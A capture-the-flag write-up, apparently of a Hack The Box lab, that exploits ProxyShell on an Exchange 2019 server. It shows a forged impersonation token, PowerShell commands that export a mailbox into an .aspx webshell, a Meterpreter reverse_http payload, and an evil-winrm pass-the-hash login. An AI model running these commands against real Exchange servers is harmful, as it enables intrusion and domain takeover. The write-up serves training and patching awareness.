Logonshell
Overview
Logonshell is a very easy Windows box hosting Microsoft Exchange Server 2019
RTM (version 15.2.221.12) on the domain edelweiss.htb. The Exchange stack is
vulnerable to ProxyShell (CVE-2021-34473 / CVE-2021-34523 / CVE-2021-31207)
— a chain of an SSRF authentication bypass, privilege elevation, and a
post-auth arbitrary file write that together yield pre-authenticated RCE. The
auth bypass generates a valid session token for Administrator@edelweiss.htb,
and a Metasploit exploit module drops a Meterpreter shell. The recovered NTLM
hash for Administrator is then used with evil-winrm for a stable session.
Path: Exchange 2019 RTM → ProxyShell auth bypass → impersonation token → Meterpreter shell → evil-winrm (pass-the-hash) → Administrator.
Enumeration
The target exposes a large number of ports consistent with an Exchange server acting as a domain controller.
$ nmap 10.129.227.141 -sV
PORT STATE SERVICE
25/tcp open smtp
53/tcp open domain
80/tcp open http
81/tcp open hosts2-ns
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
444/tcp open snpp
445/tcp open microsoft-ds
464/tcp open kpasswd5
465/tcp open smtps
587/tcp open submission
593/tcp open http-rpc-epmap
636/tcp open ldapssl
808/tcp open ccproxy-http
1801/tcp open msmq
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl

Browsing to https://10.129.227.141/owa/auth/logon.aspx confirms an Outlook
Web Access login page with a 2011 Microsoft copyright, suggesting Exchange 2010
era styling — but the exchange_proxyshell.py script clarifies the actual
version:
$ python3 exchange_proxyshell.py -u https://10.129.227.141
[+] Exchange Backend Servers: ['dc.edelweiss.htb']
[+] dc.edelweiss.htb - version: 15.2.221.12
[+] dc.edelweiss.htb - version_short: Exchange Server 2019 RTM
[+] dc.edelweiss.htb - user: NT AUTHORITY\SYSTEM
The domain is edelweiss.htb, the server is dc.edelweiss.htb, and the
Exchange version is 15.2.221.12 (Exchange Server 2019 RTM) — squarely in
the ProxyShell-vulnerable range. The script also enumerates SMTP domains
(edelweiss.htb, htb.) and surfaces the Administrator LegacyDN, setting up
the SID lookup step.
Foothold — ProxyShell (CVE-2021-34473)
ProxyLogon and a Metasploit ProxyShell module were tried first but both failed to obtain a usable shell:


The exchange_proxyshell.py PoC from
horizon3ai/proxyshell provides more
control. It successfully enumerates users from Active Directory (including
Administrator, Guest, krbtgt, anakin, and Exchange service accounts),
walks the SID-lookup chain to resolve Administrator@edelweiss.htb to SID
S-1-5-21-1677581083-3380853377-188903654-500, and generates a forged EWS
impersonation token:
$ python3 exchange_proxyshell.py -u https://10.129.227.141
[+] Retrieved LegacyDN: /o=EDELWEISS/ou=Exchange Administrative Group .../cn=...Administrator
[+] Generated token for Administrator@edelweiss.htb - S-1-5-21-...-500
[+] Token: VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9z...
PS>
The resulting PowerShell session runs constrained commands. Using the
New-ManagementRoleAssignment cmdlet grants the Mailbox Import Export role:
PS> New-ManagementRoleAssignment -Role "Mailbox Import Export" -User Administrator@edelweiss.htb
PS> New-MailboxExportRequest -Mailbox Administrator@edelweiss.htb -IncludeFolders "#Drafts#" `
-FilePath "C:\inetpub\wwwroot\aspnet_client\svjavxjxjjaqoyik.aspx" `
-ContentFilter "Subject -eq 'svjavxjxjjaqoyik'"
The webshell is written to the aspnet_client directory via the mailbox export
mechanism. Switching the Metasploit payload to
windows/x64/meterpreter/reverse_http and pointing the exploit at the placed
webshell delivers a session:



The Meterpreter session showed instability with the chosen payload:

Root
Rather than troubleshoot the Meterpreter session, the Administrator NTLM hash
is recovered from the session and used to authenticate directly via
evil-winrm:
$ evil-winrm -u Administrator -H f6b0de9c3fcb4522a273263d4adbfb16 -i edelweiss.htb

Domain Administrator access achieved.
Takeaways
- ProxyShell (CVE-2021-34473/34523/31207) chains an unauthenticated SSRF with privilege elevation and a post-auth file write, making any unpatched internet-facing Exchange instance a pre-auth RCE target. Patch immediately or take Exchange off public exposure.
- The mailbox export-to-webshell technique is a hallmark of ProxyShell
exploitation — even when direct Meterpreter sessions are unstable, the
recovered NTLM hash from the compromised session is sufficient for
pass-the-hash via
evil-winrm.